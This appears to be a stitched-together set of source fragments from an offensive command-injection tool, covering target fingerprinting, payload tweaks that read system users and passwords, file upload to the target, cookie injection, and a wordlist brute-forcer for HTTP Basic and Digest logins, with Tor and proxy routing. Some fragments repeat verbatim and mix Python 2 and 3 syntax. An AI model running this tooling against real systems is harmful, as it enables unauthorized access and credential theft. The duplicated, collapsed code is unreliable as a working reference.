def main(filename, url): try: # Ignore the mathematic calculation part (Detection phase). if menu.options.skip_calc: settings.SKIP_CALC = True # Target URL reload. if menu.options.url_reload and menu.options.data: settings.URL_RELOAD = True # Check provided parameters for tests if menu.options.test_parameter: if menu.options.test_parameter.startswith("="): menu.options.test_parameter = menu.options.test_parameter[1:] settings.TEST_PARAMETER = menu.options.test_parameter.split( settings.PARAMETER_SPLITTING_REGEX) for i in range(0, len(settings.TEST_PARAMETER)): if "=" in settings.TEST_PARAMETER[i]: settings.TEST_PARAMETER[i] = settings.TEST_PARAMETER[ i].split("=")[0] # Check if defined character used for splitting parameter values. if menu.options.pdel: settings.PARAMETER_DELIMITER = menu.options.pdel # Check if defined character used for splitting cookie values. if menu.options.cdel: settings.COOKIE_DELIMITER = menu.options.cdel # Check if specified wrong injection technique if menu.options.tech and menu.options.tech not in settings.AVAILABLE_TECHNIQUES: found_tech = False # Convert injection technique(s) to lowercase menu.options.tech = menu.options.tech.lower() # Check if used the ',' separator if settings.PARAMETER_SPLITTING_REGEX in menu.options.tech: split_techniques_names = menu.options.tech.split( settings.PARAMETER_SPLITTING_REGEX) else: split_techniques_names = menu.options.tech.split() if split_techniques_names: for i in range(0, len(split_techniques_names)): if len(menu.options.tech) <= 4: split_first_letter = list(menu.options.tech) for j in range(0, len(split_first_letter)): if split_first_letter[ j] in settings.AVAILABLE_TECHNIQUES: found_tech = True else: found_tech = False if split_techniques_names[i].replace(' ', '') not in settings.AVAILABLE_TECHNIQUES and \ found_tech == False: err_msg = "You specified wrong value '" + split_techniques_names[ i] err_msg += "' as injection technique. 
" err_msg += "The value, must be a string composed by the letters (C)lassic, (E)val-based, " err_msg += "(T)ime-based, (F)ile-based (with or without commas)." print settings.print_critical_msg(err_msg) sys.exit(0) # Check if specified wrong alternative shell if menu.options.alter_shell: if menu.options.alter_shell.lower( ) not in settings.AVAILABLE_SHELLS: err_msg = "'" + menu.options.alter_shell + "' shell is not supported!" print settings.print_critical_msg(err_msg) sys.exit(0) # Check the file-destination if menu.options.file_write and not menu.options.file_dest or \ menu.options.file_upload and not menu.options.file_dest: err_msg = "Host's absolute filepath to write and/or upload, must be specified (--file-dest)." print settings.print_critical_msg(err_msg) sys.exit(0) if menu.options.file_dest and menu.options.file_write == None and menu.options.file_upload == None: err_msg = "You must enter the '--file-write' or '--file-upload' parameter." print settings.print_critical_msg(err_msg) sys.exit(0) # Check if defined "--random-agent" option. if menu.options.random_agent: menu.options.agent = random.choice(settings.USER_AGENT_LIST) # Check if defined "--url" or "-m" option. if url: # Check if http / https url = checks.check_http_s(url) # Load the crawler if menu.options.crawldepth > 0 or menu.options.sitemap_url: if menu.options.crawldepth > 0: menu.options.DEFAULT_CRAWLDEPTH_LEVEL = menu.options.crawldepth else: if menu.options.sitemap_url: while True: if not menu.options.batch: question_msg = "Do you want to change the crawling depth level? 
[Y/n] > " sys.stdout.write( settings.print_question_msg(question_msg)) change_depth_level = sys.stdin.readline( ).replace("\n", "").lower() else: change_depth_level = "" if len(change_depth_level) == 0: change_depth_level = "y" if change_depth_level in settings.CHOICE_YES or change_depth_level in settings.CHOICE_NO: break elif change_depth_level in settings.CHOICE_QUIT: sys.exit(0) else: err_msg = "'" + change_depth_level + "' is not a valid answer." print settings.print_error_msg(err_msg) pass # Change the crawling depth level. if change_depth_level in settings.CHOICE_YES: while True: question_msg = "Please enter the crawling depth level (1-2) > " sys.stdout.write( settings.print_question_msg(question_msg)) depth_level = sys.stdin.readline().replace( "\n", "").lower() if int(depth_level) >= 3: err_msg = "Depth level '" + depth_level + "' is not a valid answer." print settings.print_error_msg(err_msg) pass else: menu.options.DEFAULT_CRAWLDEPTH_LEVEL = depth_level break # Crawl the url. url = crawler.crawler(url) try: # Check if defined POST data if menu.options.data: request = urllib2.Request(url, menu.options.data) else: request = urllib2.Request(url) headers.do_check(request) #headers.check_http_traffic(request) # Check if defined any HTTP Proxy (--proxy option). if menu.options.proxy: proxy.do_check(url) # Check if defined Tor (--tor option). elif menu.options.tor: tor.do_check() if menu.options.flush_session: session_handler.flush(url) info_msg = "Checking connection to the target URL... " sys.stdout.write(settings.print_info_msg(info_msg)) sys.stdout.flush() if settings.VERBOSITY_LEVEL >= 2: print "" headers.check_http_traffic(request) try: # Check if defined any HTTP Proxy (--proxy option). if menu.options.proxy: response = proxy.use_proxy(request) # Check if defined Tor (--tor option). elif menu.options.tor: response = tor.use_tor(request) else: try: response = urllib2.urlopen(request) except ValueError: # Invalid format for the '--headers' option. 
if settings.VERBOSITY_LEVEL < 2: print "[ " + Fore.RED + "FAILED" + Style.RESET_ALL + " ]" err_msg = "Use '--headers=\"HEADER_NAME:HEADER_VALUE\"' " err_msg += "to provide an HTTP header or" err_msg += " '--headers=\"HEADER_NAME:" + settings.WILDCARD_CHAR + "\"' " err_msg += "if you want to try to exploit the provided HTTP header." print settings.print_critical_msg(err_msg) sys.exit(0) except urllib2.HTTPError, e: if settings.VERBOSITY_LEVEL < 2: print "[ " + Fore.RED + "FAILED" + Style.RESET_ALL + " ]" err_msg = str(e).replace(": ", " (") + ")." print settings.print_critical_msg(err_msg) raise SystemExit html_data = content = response.read() if settings.VERBOSITY_LEVEL < 2: print "[ " + Fore.GREEN + "SUCCEED" + Style.RESET_ALL + " ]" # Check for CGI scripts on url checks.check_CGI_scripts(url) # Modification on payload if not menu.options.shellshock: #settings.CURRENT_USER = "******" + settings.CURRENT_USER + ")" settings.SYS_USERS = "echo $(" + settings.SYS_USERS + ")" settings.SYS_PASSES = "echo $(" + settings.SYS_PASSES + ")" # Check if defined "--file-upload" option. if menu.options.file_upload: if not re.match(settings.VALID_URL_FORMAT, menu.options.file_upload): # Check if not defined URL for upload. while True: if not menu.options.batch: question_msg = "Do you want to enable an HTTP server? [Y/n] > " sys.stdout.write( settings.print_question_msg(question_msg)) enable_HTTP_server = sys.stdin.readline( ).replace("\n", "").lower() else: enable_HTTP_server == "" if len(enable_HTTP_server) == 0: enable_HTTP_server = "y" if enable_HTTP_server in settings.CHOICE_YES: # Check if file exists if not os.path.isfile( menu.options.file_upload): err_msg = "The '" + menu.options.file_upload + "' file, does not exists." 
sys.stdout.write( settings.print_critical_msg(err_msg) + "\n") sys.exit(0) if settings.LOCAL_HTTP_IP == None: while True: question_msg = "Please enter your interface IP address > " sys.stdout.write( settings.print_question_msg( question_msg)) ip_addr = sys.stdin.readline().replace( "\n", "").lower() # check if IP address is valid ip_check = simple_http_server.is_valid_ipv4( ip_addr) if ip_check == False: err_msg = "The provided IP address seems not valid." print settings.print_error_msg( err_msg) pass else: settings.LOCAL_HTTP_IP = ip_addr break http_server = "http://" + str( settings.LOCAL_HTTP_IP) + ":" + str( settings.LOCAL_HTTP_PORT) + "/" info_msg = "Setting the HTTP server on '" + http_server + "'. " print settings.print_info_msg(info_msg) menu.options.file_upload = http_server + menu.options.file_upload simple_http_server.main() break elif enable_HTTP_server in settings.CHOICE_NO: if not re.match(settings.VALID_URL_FORMAT, menu.options.file_upload): err_msg = "The '" + menu.options.file_upload + "' is not a valid URL. " print settings.print_critical_msg(err_msg) sys.exit(0) break elif enable_HTTP_server in settings.CHOICE_QUIT: sys.exit(0) else: err_msg = "'" + enable_HTTP_server + "' is not a valid answer." print settings.print_error_msg(err_msg) pass try: urllib2.urlopen(menu.options.file_upload) except urllib2.HTTPError, err_msg: print settings.print_critical_msg(str(err_msg.code)) sys.exit(0) except urllib2.URLError, err_msg: print settings.print_critical_msg( str(err_msg.args[0]).split("] ")[1] + ".") sys.exit(0)
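def _auth_probe(request):
  """Send one authentication attempt over the configured transport.

  proxy.use_proxy() with --proxy, tor.use_tor() with --tor, otherwise a
  direct urlopen(). Exactly one request goes out per call; a rejected pair
  surfaces as an exception from the transport.
  """
  if menu.options.proxy:
    return proxy.use_proxy(request)
  if menu.options.tor:
    return tor.use_tor(request)
  return _urllib.request.urlopen(request)


def http_auth_cracker(url, realm):
  """Brute-force HTTP authentication on *url* with the bundled wordlists.

  Every username/password pair from define_wordlists() is tried with the
  scheme given by --auth-type ("basic" or "digest"; *realm* is only used for
  Digest). The first pair the server accepts is stored in the session via
  session_handler.import_valid_credentials() and returned as the string
  "username:password". Returns False when the wordlists are exhausted or
  when --auth-type is neither scheme. Progress goes to stdout according to
  settings.VERBOSITY_LEVEL.
  """
  # Define the HTTP authentication type.
  authentication_type = menu.options.auth_type
  scheme = str(authentication_type).lower()
  if scheme not in ("basic", "digest"):
    # Without this guard an unknown scheme sent nothing and still recorded
    # the very first wordlist pair as "valid".
    err_msg = "'" + str(authentication_type) + "' is not a supported HTTP authentication type."
    print(settings.print_critical_msg(err_msg))
    return False
  # Define the authentication wordlists for usernames / passwords.
  usernames, passwords = define_wordlists()
  i = 1
  found = False
  total = len(usernames) * len(passwords)
  for username in usernames:
    for password in passwords:
      float_percent = "{0:.1f}%".format(round(((i*100)/(total*1.0)),2))
      # Check if verbose mode on
      if settings.VERBOSITY_LEVEL >= 1:
        payload = username + ":" + password
        if settings.VERBOSITY_LEVEL > 1:
          print(settings.print_checking_msg(payload))
        else:
          sys.stdout.write("\r" + settings.print_checking_msg(payload) + " " * 10)
          sys.stdout.flush()
      try:
        # Basic authentication
        if scheme == "basic":
          request = _urllib.request.Request(url)
          # b64encode takes bytes on both Python 2 and 3 and never inserts
          # line breaks; base64.encodestring() rejected str on Python 3 (and
          # is gone since 3.9), so every Basic attempt there failed silently.
          credentials = (username + ":" + password).encode("utf-8")
          base64string = base64.b64encode(credentials).decode("ascii")
          request.add_header("Authorization", "Basic " + base64string)
          headers.do_check(request)
        # Digest authentication
        else:
          authhandler = _urllib.request.HTTPDigestAuthHandler()
          authhandler.add_password(realm, url, username, password)
          opener = _urllib.request.build_opener(authhandler)
          # Process-wide side effect: later urlopen() calls keep this opener.
          _urllib.request.install_opener(opener)
          request = _urllib.request.Request(url)
        headers.check_http_traffic(request)
        # One request per attempt. The proxy/Tor result used to be discarded
        # and the same request re-sent directly, which doubled the traffic
        # and sent the probe outside the proxy/Tor path.
        _auth_probe(request)
        # Store valid results to session
        admin_panel = url
        session_handler.import_valid_credentials(url, authentication_type, admin_panel, username, password)
        found = True
      except KeyboardInterrupt:
        raise
      except _urllib.error.HTTPError:
        # The server rejected the pair (typically 401); try the next one.
        pass
      except Exception as err_msg:
        # Transport-level failures were swallowed by a bare `except:` (which
        # also ate SystemExit). Still best-effort, but at -vv say why an
        # attempt could not be evaluated.
        if settings.VERBOSITY_LEVEL > 1:
          print(settings.print_critical_msg(str(err_msg)))
      if found:
        if not settings.VERBOSITY_LEVEL >= 1:
          float_percent = settings.SUCCESS_MSG
      else:
        if str(float_percent) == "100.0%":
          if not settings.VERBOSITY_LEVEL >= 1:
            float_percent = settings.FAIL_STATUS
        else:
          i = i + 1
          float_percent = ".. (" + float_percent + ")"
      if not settings.VERBOSITY_LEVEL >= 1:
        info_msg = "Checking for a valid pair of credentials."
        info_msg += float_percent
        sys.stdout.write("\r\r" + settings.print_info_msg(info_msg))
        sys.stdout.flush()
      if found:
        valid_pair = username + ":" + password
        if not settings.VERBOSITY_LEVEL > 1:
          print("")
        success_msg = "Identified a valid pair of credentials '"
        success_msg += valid_pair + Style.RESET_ALL + Style.BRIGHT + "'."
        print(settings.print_success_msg(success_msg))
        return valid_pair
  err_msg = "Use the '--auth-cred' option to provide a valid pair of "
  err_msg += "HTTP authentication credentials (i.e --auth-cred=\"admin:admin\") "
  err_msg += "or place an other dictionary into '"
  err_msg += os.path.abspath(os.path.join(os.path.dirname(__file__), '..', 'txt')) + "/' directory."
  print("\n" + settings.print_critical_msg(err_msg))
  return False
# eof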
def main(): try: # Check if defined "--version" option. if menu.options.version: version.show_version() sys.exit(0) # Checkall the banner menu.banner() # Check python version number. version.python_version() # Check if defined "--dependencies" option. # For checking (non-core) third party dependenices. if menu.options.noncore_dependencies: checks.third_party_dependencies() sys.exit(0) # Check if defined "--update" option. if menu.options.update: update.updater() # Check if defined "--install" option. if menu.options.install: install.installer() sys.exit(0) # Check arguments if len(sys.argv) == 1: menu.parser.print_help() print "" sys.exit(0) # Define the level of verbosity. if menu.options.verbose > 4: err_msg = "The value for option '-v' " err_msg += "must be an integer value from range [0, 4]." print settings.print_critical_msg(err_msg) sys.exit(0) else: settings.VERBOSITY_LEVEL = menu.options.verbose # Check if defined "--delay" option. if menu.options.delay > "0": settings.DELAY = menu.options.delay # Define the level of tests to perform. if menu.options.level > 3: err_msg = "The value for option '--level' " err_msg += "must be an integer value from range [1, 3]." print settings.print_critical_msg(err_msg) sys.exit(0) # Define the local path where Metasploit Framework is installed. if menu.options.msf_path: settings.METASPLOIT_PATH = menu.options.msf_path # Parse target / data from HTTP proxy logs (i.e Burp / WebScarab). if menu.options.logfile: parser.logfile_parser() # Ignore the mathematic calculation part (Detection phase). if menu.options.skip_calc: settings.SKIP_CALC = True # Target URL reload. 
if menu.options.url_reload and menu.options.data: settings.URL_RELOAD = True # Check provided parameters for tests if menu.options.test_parameter: if menu.options.test_parameter.startswith("="): menu.options.test_parameter = menu.options.test_parameter[1:] settings.TEST_PARAMETER = menu.options.test_parameter.split(settings.PARAMETER_SPLITTING_REGEX) for i in range(0,len(settings.TEST_PARAMETER)): if "=" in settings.TEST_PARAMETER[i]: settings.TEST_PARAMETER[i] = settings.TEST_PARAMETER[i].split("=")[0] # Check if ".git" exists and check for updated version! if os.path.isdir("./.git") and settings.CHECK_FOR_UPDATES_ON_START: update.check_for_update() # Check if defined character used for splitting parameter values. if menu.options.pdel: settings.PARAMETER_DELIMITER = menu.options.pdel # Check if defined character used for splitting cookie values. if menu.options.cdel: settings.COOKIE_DELIMITER = menu.options.cdel # Check if specified wrong injection technique if menu.options.tech and menu.options.tech not in settings.AVAILABLE_TECHNIQUES: found_tech = False # Convert injection technique(s) to lowercase menu.options.tech = menu.options.tech.lower() # Check if used the ',' separator if settings.PARAMETER_SPLITTING_REGEX in menu.options.tech: split_techniques_names = menu.options.tech.split(settings.PARAMETER_SPLITTING_REGEX) else: split_techniques_names = menu.options.tech.split() if split_techniques_names: for i in range(0,len(split_techniques_names)): if len(menu.options.tech) <= 4: split_first_letter = list(menu.options.tech) for j in range(0,len(split_first_letter)): if split_first_letter[j] in settings.AVAILABLE_TECHNIQUES: found_tech = True else: found_tech = False if split_techniques_names[i].replace(' ', '') not in settings.AVAILABLE_TECHNIQUES and \ found_tech == False: err_msg = "You specified wrong value '" + split_techniques_names[i] err_msg += "' as injection technique. 
" err_msg += "The value, must be a string composed by the letters (C)lassic, (E)val-based, " err_msg += "(T)ime-based, (F)ile-based (with or without commas)." print settings.print_critical_msg(err_msg) sys.exit(0) # Check if specified wrong alternative shell if menu.options.alter_shell: if menu.options.alter_shell.lower() not in settings.AVAILABLE_SHELLS: err_msg = "'" + menu.options.alter_shell + "' shell is not supported!" print settings.print_critical_msg(err_msg) sys.exit(0) # Check the file-destination if menu.options.file_write and not menu.options.file_dest or \ menu.options.file_upload and not menu.options.file_dest: err_msg = "Host's absolute filepath to write and/or upload, must be specified (--file-dest)." print settings.print_critical_msg(err_msg) sys.exit(0) if menu.options.file_dest and menu.options.file_write == None and menu.options.file_upload == None : err_msg = "You must enter the '--file-write' or '--file-upload' parameter." print settings.print_critical_msg(err_msg) sys.exit(0) # Check if defined "--random-agent" option. if menu.options.random_agent: menu.options.agent = random.choice(settings.USER_AGENT_LIST) # Check if defined "--url" option. if menu.options.url: url = menu.options.url # Check if http / https url = checks.check_http_s(url) # Load the crawler if menu.options.crawldepth > 0: menu.options.DEFAULT_CRAWLDEPTH_LEVEL = menu.options.crawldepth url = crawler.crawler(url) if menu.options.output_dir: output_dir = menu.options.output_dir else: output_dir = settings.OUTPUT_DIR # One directory up, if Windows or if the script is being run under "/src". if settings.IS_WINDOWS or "/src" in os.path.dirname(os.path.abspath(__file__)): os.chdir("..") output_dir = os.path.dirname(output_dir) try: os.stat(output_dir) except: os.mkdir(output_dir) # The logs filename construction. 
filename = logs.create_log_file(url, output_dir) try: # Check if defined POST data if menu.options.data: request = urllib2.Request(url, menu.options.data) else: request = urllib2.Request(url) headers.do_check(request) #headers.check_http_traffic(request) # Check if defined any HTTP Proxy (--proxy option). if menu.options.proxy: proxy.do_check(url) # Check if defined Tor (--tor option). elif menu.options.tor: tor.do_check() if menu.options.flush_session: session_handler.flush(url) info_msg = "Checking connection to the target URL... " sys.stdout.write(settings.print_info_msg(info_msg)) sys.stdout.flush() if settings.VERBOSITY_LEVEL >= 2: print "" headers.check_http_traffic(request) try: # Check if defined any HTTP Proxy (--proxy option). if menu.options.proxy: response = proxy.use_proxy(request) # Check if defined Tor (--tor option). elif menu.options.tor: response = tor.use_tor(request) else: try: response = urllib2.urlopen(request) except ValueError: # Invalid format for the '--headers' option. if settings.VERBOSITY_LEVEL < 2: print "[ " + Fore.RED + "FAILED" + Style.RESET_ALL + " ]" err_msg = "Use '--headers=\"HEADER_NAME:HEADER_VALUE\"' " err_msg += "to provide an HTTP header or" err_msg += " '--headers=\"HEADER_NAME:" + settings.WILDCARD_CHAR + "\"' " err_msg += "if you want to try to exploit the provided HTTP header." print settings.print_critical_msg(err_msg) sys.exit(0) except: raise html_data = content = response.read() if settings.VERBOSITY_LEVEL < 2: print "[ " + Fore.GREEN + "SUCCEED" + Style.RESET_ALL + " ]" # Check for CGI scripts on url checks.check_CGI_scripts(url) # Modification on payload if not menu.options.shellshock: #settings.CURRENT_USER = "******" + settings.CURRENT_USER + ")" settings.SYS_USERS = "echo $(" + settings.SYS_USERS + ")" settings.SYS_PASSES = "echo $(" + settings.SYS_PASSES + ")" # Check if defined "--file-upload" option. 
if menu.options.file_upload: if not re.match(settings.VALID_URL_FORMAT, menu.options.file_upload): # Check if not defined URL for upload. while True: question_msg = "Do you want to enable an HTTP server? [Y/n/q] > " sys.stdout.write(settings.print_question_msg(question_msg)) enable_HTTP_server = sys.stdin.readline().replace("\n","").lower() if len(enable_HTTP_server) == 0: enable_HTTP_server = "y" if enable_HTTP_server in settings.CHOICE_YES: # Check if file exists if not os.path.isfile(menu.options.file_upload): err_msg = "The '" + menu.options.file_upload + "' file, does not exists." sys.stdout.write(settings.print_critical_msg(err_msg) + "\n") sys.exit(0) http_server = "http://" + str(settings.LOCAL_HTTP_IP) + ":" + str(settings.LOCAL_HTTP_PORT) + "/" info_msg = "Setting the HTTP server on '" + http_server + "'. " print settings.print_info_msg(info_msg) menu.options.file_upload = http_server + menu.options.file_upload simple_http_server.main() break elif enable_HTTP_server in settings.CHOICE_NO: if not re.match(settings.VALID_URL_FORMAT, menu.options.file_upload): err_msg = "The '" + menu.options.file_upload + "' is not a valid URL. " print settings.print_critical_msg(err_msg) sys.exit(0) break elif enable_HTTP_server in settings.CHOICE_QUIT: sys.exit(0) else: err_msg = "'" + enable_HTTP_server + "' is not a valid answer." print settings.print_error_msg(err_msg) pass try: urllib2.urlopen(menu.options.file_upload) except urllib2.HTTPError, err_msg: print settings.print_critical_msg(err_msg) sys.exit(0) except urllib2.URLError, err_msg: print settings.print_critical_msg(err_msg) sys.exit(0) # Used a valid pair of valid credentials if menu.options.auth_cred: success_msg = Style.BRIGHT + "Identified a valid pair of credentials '" success_msg += menu.options.auth_cred + Style.RESET_ALL success_msg += Style.BRIGHT + "'." 
+ Style.RESET_ALL print settings.print_success_msg(success_msg) try: if response.info()['server'] : server_banner = response.info()['server'] found_os_server = False if menu.options.os and checks.user_defined_os(): user_defined_os = settings.TARGET_OS # Procedure for target OS identification. for i in range(0,len(settings.SERVER_OS_BANNERS)): if settings.SERVER_OS_BANNERS[i].lower() in server_banner.lower(): found_os_server = True settings.TARGET_OS = settings.SERVER_OS_BANNERS[i].lower() if settings.TARGET_OS == "win" or settings.TARGET_OS == "microsoft" : identified_os = "Windows" if menu.options.os and user_defined_os != "win": if not checks.identified_os(): settings.TARGET_OS = user_defined_os settings.TARGET_OS = identified_os[:3].lower() if menu.options.shellshock: err_msg = "The shellshock module is not available for " err_msg += identified_os + " targets." print settings.print_critical_msg(err_msg) raise SystemExit() else: identified_os = "Unix-like (" + settings.TARGET_OS + ")" if menu.options.os and user_defined_os == "win": if not checks.identified_os(): settings.TARGET_OS = user_defined_os # Procedure for target server identification. found_server_banner = False if settings.VERBOSITY_LEVEL >= 1: info_msg = "Identifying the target server... " sys.stdout.write(settings.print_info_msg(info_msg)) sys.stdout.flush() for i in range(0,len(settings.SERVER_BANNERS)): if settings.SERVER_BANNERS[i].lower() in server_banner.lower(): if settings.VERBOSITY_LEVEL >= 1: print "[ " + Fore.GREEN + "SUCCEED" + Style.RESET_ALL + " ]" if settings.VERBOSITY_LEVEL >= 1: success_msg = "The target server was identified as " success_msg += server_banner + Style.RESET_ALL + "." 
print settings.print_success_msg(success_msg) settings.SERVER_BANNER = server_banner found_server_banner = True # Set up default root paths if settings.SERVER_BANNERS[i].lower() == "apache": if settings.TARGET_OS == "win": settings.SRV_ROOT_DIR = "\\htdocs" else: settings.SRV_ROOT_DIR = "/var/www" if settings.SERVER_BANNERS[i].lower() == "nginx": settings.SRV_ROOT_DIR = "/usr/share/nginx" if settings.SERVER_BANNERS[i].lower() == "microsoft-iis": settings.SRV_ROOT_DIR = "\\inetpub\\wwwroot" break if not found_server_banner: if settings.VERBOSITY_LEVEL >= 1: print "[ " + Fore.RED + "FAILED" + Style.RESET_ALL + " ]" warn_msg = "Heuristics have failed to identify target server." print settings.print_warning_msg(warn_msg) # Procedure for target application identification found_application_extension = False if settings.VERBOSITY_LEVEL >= 1: info_msg = "Identifying the target application ... " sys.stdout.write(settings.print_info_msg(info_msg)) sys.stdout.flush() root, application_extension = splitext(urlparse(url).path) settings.TARGET_APPLICATION = application_extension[1:].upper() if settings.TARGET_APPLICATION: found_application_extension = True if settings.VERBOSITY_LEVEL >= 1: print "[ " + Fore.GREEN + "SUCCEED" + Style.RESET_ALL + " ]" success_msg = "The target application was identified as " success_msg += settings.TARGET_APPLICATION + Style.RESET_ALL + "." print settings.print_success_msg(success_msg) # Check for unsupported target applications for i in range(0,len(settings.UNSUPPORTED_TARGET_APPLICATION)): if settings.TARGET_APPLICATION.lower() in settings.UNSUPPORTED_TARGET_APPLICATION[i].lower(): err_msg = settings.TARGET_APPLICATION + " exploitation is not yet supported." print settings.print_critical_msg(err_msg) raise SystemExit() if not found_application_extension: if settings.VERBOSITY_LEVEL >= 1: print "[ " + Fore.RED + "FAILED" + Style.RESET_ALL + " ]" warn_msg = "Heuristics have failed to identify target application." 
print settings.print_warning_msg(warn_msg) # Load tamper scripts if menu.options.tamper: checks.tamper_scripts() # Store the Server's root dir settings.DEFAULT_SRV_ROOT_DIR = settings.SRV_ROOT_DIR if menu.options.is_admin or menu.options.is_root and not menu.options.current_user: menu.options.current_user = True # Define Python working directory. if settings.TARGET_OS == "win" and menu.options.alter_shell: while True: question_msg = "Do you want to use '" + settings.WIN_PYTHON_DIR question_msg += "' as Python working directory on the target host? [Y/n] > " sys.stdout.write(settings.print_question_msg(question_msg)) python_dir = sys.stdin.readline().replace("\n","").lower() if len(python_dir) == 0: python_dir = "y" if python_dir in settings.CHOICE_YES: break elif python_dir in settings.CHOICE_NO: question_msg = "Please provide a custom working directory for Python (e.g. '" question_msg += settings.WIN_PYTHON_DIR + "') > " sys.stdout.write(settings.print_question_msg(question_msg)) settings.WIN_PYTHON_DIR = sys.stdin.readline().replace("\n","").lower() break else: err_msg = "'" + python_dir + "' is not a valid answer." print settings.print_error_msg(err_msg) pass settings.USER_DEFINED_PYTHON_DIR = True # Check for wrong flags. if settings.TARGET_OS == "win": if menu.options.is_root : warn_msg = "Swithing '--is-root' to '--is-admin' because the " warn_msg += "target has been identified as windows." print settings.print_warning_msg(warn_msg) if menu.options.passwords: warn_msg = "The '--passwords' option, is not yet available for Windows targets." print settings.print_warning_msg(warn_msg) if menu.options.file_upload : warn_msg = "The '--file-upload' option, is not yet available for windows targets. " warn_msg += "Instead, use the '--file-write' option." print settings.print_warning_msg(warn_msg) sys.exit(0) else: if menu.options.is_admin : warn_msg = "Swithing the '--is-admin' to '--is-root' because " warn_msg += "the target has been identified as unix-like. 
" print settings.print_warning_msg(warn_msg) if found_os_server == False and \ not menu.options.os: # If "--shellshock" option is provided then, # by default is a Linux/Unix operating system. if menu.options.shellshock: pass else: warn_msg = "Heuristics have failed to identify server's operating system." print settings.print_warning_msg(warn_msg) while True: question_msg = "Do you recognise the server's operating system? " question_msg += "[(W)indows/(U)nix/(q)uit] > " sys.stdout.write(settings.print_question_msg(question_msg)) got_os = sys.stdin.readline().replace("\n","").lower() if got_os.lower() in settings.CHOICE_OS : if got_os.lower() == "w": settings.TARGET_OS = "win" break elif got_os.lower() == "u": break elif got_os.lower() == "q": raise SystemExit() else: if got_os == "": got_os = "y" err_msg = "'" + got_os + "' is not a valid answer." print settings.print_error_msg(err_msg) pass if not menu.options.os: if found_server_banner == False: warn_msg = "The server which was identified as " warn_msg += server_banner + " seems unknown." print settings.print_warning_msg(warn_msg) else: found_os_server = checks.user_defined_os() except KeyError: pass # Charset detection. requests.charset_detection(response)
print settings.print_critical_msg(err) continue_tests = checks.continue_tests(err_msg) if continue_tests == True: settings.IGNORE_ERR_MSG = True else: raise SystemExit() response = False except urllib2.URLError, err_msg: err_msg = str(err_msg.reason).split(" ")[2:] err_msg = ' '.join(err_msg)+ "." if settings.VERBOSITY_LEVEL >= 1 and settings.LOAD_SESSION == False: print "" print settings.print_critical_msg(err_msg) raise SystemExit() else: response = headers.check_http_traffic(request) return response """ Check if target host is vulnerable. (Cookie-based injection) """ def cookie_injection(url, vuln_parameter, payload): def inject_cookie(url, vuln_parameter, payload, proxy): if proxy == None: opener = urllib2.build_opener() else: opener = urllib2.build_opener(proxy) if settings.TIME_RELATIVE_ATTACK : payload = urllib.quote(payload)
print settings.print_critical_msg(err) continue_tests = checks.continue_tests(err_msg) if continue_tests == True: settings.IGNORE_ERR_MSG = True else: raise SystemExit() response = False except urllib2.URLError, err_msg: err_msg = str(err_msg.reason).split(" ")[2:] err_msg = ' '.join(err_msg)+ "." if settings.VERBOSITY_LEVEL >= 1 and settings.LOAD_SESSION == False: print "" print settings.print_critical_msg(err_msg) raise SystemExit() else: response = headers.check_http_traffic(request) return response """ Check if target host is vulnerable. (Cookie-based injection) """ def cookie_injection(url, vuln_parameter, payload): def inject_cookie(url, vuln_parameter, payload, proxy): if proxy == None: opener = urllib2.build_opener() else: opener = urllib2.build_opener(proxy) if settings.TIME_RELATIVE_ATTACK : payload = urllib.quote(payload)
def examine_request(request):
  """Send ``request`` through the configured path and return the response.

  The path is proxy.use_proxy() when --proxy is set, tor.use_tor() when
  --tor is set, otherwise a direct _urllib.request.urlopen().

  Args:
    request: A prepared _urllib.request.Request.

  Returns:
    Whatever the chosen transport returns; False when an HTTPError /
    URLError is skipped in --bulkfile mode; None when the generic handler
    below catches an exception and does not exit (a 401 matched by
    --ignore-code, or any message without "unauthorized" in it).

  Raises:
    SystemExit: on connection reset/refused, on a malformed --header
      value, on a rejected --auth-cred pair, and on HTTPError/URLError
      outside --bulkfile mode.

  NOTE(review): the except-clause nesting was reconstructed from a
  collapsed listing — confirm against the original layout. As laid out
  here, the inner ``except Exception`` also catches HTTPError/URLError
  raised by the direct urlopen() (both subclass Exception), so the two
  outer handlers only see errors from check_http_traffic() and the
  proxy/Tor paths. ``url`` in those outer handlers is not a parameter or
  local of this function — presumably a module-level name; verify.
  SocketError/errno are imported elsewhere in the file.
  """
  try:
    headers.check_http_traffic(request)
    # Check if defined any HTTP Proxy (--proxy option).
    if menu.options.proxy:
      return proxy.use_proxy(request)
    # Check if defined Tor (--tor option).
    elif menu.options.tor:
      return tor.use_tor(request)
    else:
      try:
        return _urllib.request.urlopen(request)
      except SocketError as e:
        # Only ECONNRESET / ECONNREFUSED get a message; every socket
        # error exits.
        if e.errno == errno.ECONNRESET:
          error_msg = "Connection reset by peer."
          print(settings.print_critical_msg(error_msg))
        elif e.errno == errno.ECONNREFUSED:
          error_msg = "Connection refused."
          print(settings.print_critical_msg(error_msg))
        raise SystemExit()
      except ValueError:
        # Invalid format for the '--header' option.
        if settings.VERBOSITY_LEVEL < 2:
          print("[ " + Fore.RED + "FAILED" + Style.RESET_ALL + " ]")
        # NOTE(review): no space between "...HEADER_VALUE\"'" and "to provide".
        err_msg = "Use '--header=\"HEADER_NAME: HEADER_VALUE\"'"
        err_msg += "to provide an extra HTTP header or"
        err_msg += " '--header=\"HEADER_NAME: " + settings.WILDCARD_CHAR + "\"' "
        err_msg += "if you want to try to exploit the provided HTTP header."
        print(settings.print_critical_msg(err_msg))
        raise SystemExit()
      except Exception as err_msg:
        # Matches on the exception text, e.g. "HTTP Error 401: Unauthorized".
        if "unauthorized" in str(err_msg).lower():
          if menu.options.ignore_code == settings.UNAUTHORIZED_ERROR:
            # Deliberately ignored; falls through and returns None.
            pass
          elif menu.options.auth_type and menu.options.auth_cred:
            err_msg = "The provided pair of " + menu.options.auth_type
            err_msg += " HTTP authentication credentials '" + menu.options.auth_cred + "'"
            err_msg += " seems to be invalid."
            err_msg += " Try to rerun without providing '--auth-cred' and '--auth-type' options,"
            err_msg += " in order to perform a dictionary-based attack."
            print(settings.print_critical_msg(err_msg))
            raise SystemExit()
          else:
            # Prefer the text after "] " in the first exception arg;
            # fall back to reformatting the whole message.
            try:
              error_msg = str(err_msg.args[0]).split("] ")[1] + "."
            except IndexError:
              error_msg = str(err_msg).replace(": ", " (") + ")."
            print(settings.print_critical_msg(error_msg))
            raise SystemExit()
  except _urllib.error.HTTPError as err_msg:
    error_description = ""
    # NOTE(review): split(": ")[1] raises IndexError if the message has
    # no ": " — not handled here.
    if len(str(err_msg).split(": ")[1]) == 0:
      error_description = "Non-standard HTTP status code"
